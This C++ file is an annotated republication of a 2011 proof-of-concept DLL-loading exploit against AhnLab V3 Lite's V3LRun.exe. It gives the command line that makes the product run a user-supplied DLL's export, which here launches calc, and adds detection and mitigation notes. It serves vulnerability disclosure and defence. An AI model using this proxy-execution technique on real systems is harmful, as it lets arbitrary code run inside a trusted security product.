/*
 * Exploit Title : AhnLab V3 Lite (V3LUp.dll) Dll Hijacking Exploit
 * Date          : 03\8\2011
 * Author        : wh1ant
 * Vendor or Software Link:
 *                 http://v3lite.v3webhard.com/download/V3LiteSG_Setup.exe
 * Version       : V3 engine version: 2011.08.03.00
 * Category      : local
 * Tested on     : Microsoft Windows XP Professional SP3 (KR) and
 *                 Microsoft Windows 7 Ultimate (KR)
 * Target program: V3LRun.exe
 *
 * Compile (as published):
 *   gcc -shared V3LUp.dll -o V3LUp.cpp
 *   or visual studio 2008 used
 *   NOTE(review): the input and output file names look transposed in the
 *   published command; the source file here is C++ (it uses extern "C").
 *
 * Running (as published):
 *   C:\Users\wh1ant>"C:\Program Files\AhnLab\V3Lite\V3LRun.exe" C:\Users\wh1ant\V3LUp.dll,command_run aaa
 *
 * What the report shows:
 *   In the command line above, V3LRun.exe is given "<dll path>,<export name>"
 *   and the DLL lives in a user-writable profile directory. The DLL is
 *   therefore handed to the host explicitly, rundll32-style, rather than
 *   planted on a search path. Presumably V3LRun.exe loads that module and
 *   calls the named export without checking where the file comes from or who
 *   signed it -- confirm against the vendor binary.
 *
 * Why it matters to defenders:
 *   Code chosen by the caller runs inside a security product's process. If
 *   that host binary is signed or allow-listed, this is a proxy-execution
 *   primitive (compare MITRE ATT&CK T1218, System Binary Proxy Execution).
 *
 * Detection ideas:
 *   - Process-creation events where V3LRun.exe's command line names a DLL
 *     outside the product's install directory.
 *   - Image-load telemetry (e.g. Sysmon Event ID 7) showing V3LRun.exe
 *     mapping an unsigned module from a user-writable path.
 *   - Unexpected child processes of V3LRun.exe.
 *
 * Mitigation for a host of this kind:
 *   Accept only modules under the protected install directory and verify the
 *   module's Authenticode signature (WinVerifyTrust) before loading it.
 */

#include <windows.h>

/* Export named on the host's command line; C linkage keeps the name unmangled. */
extern "C" __declspec(dllexport) void command_run(void);

/*
 * DLL entry point. It performs no work for any notification and always
 * reports success, so nothing in this file runs merely because the module
 * was mapped; the demonstration code runs only when the host calls the
 * export below.
 */
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD   ul_reason_for_call,
                      LPVOID  lpReserved)
{
    /* Attach and detach notifications are all ignored. */
    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;

    return TRUE;
}

/*
 * Proof-of-execution marker: starts the program named "calc" in a visible
 * window. Its appearance shows that the host process executed code from the
 * supplied DLL. The return value of WinExec is not inspected.
 */
extern "C" __declspec(dllexport) void command_run(void)
{
    WinExec("calc", SW_SHOW);
}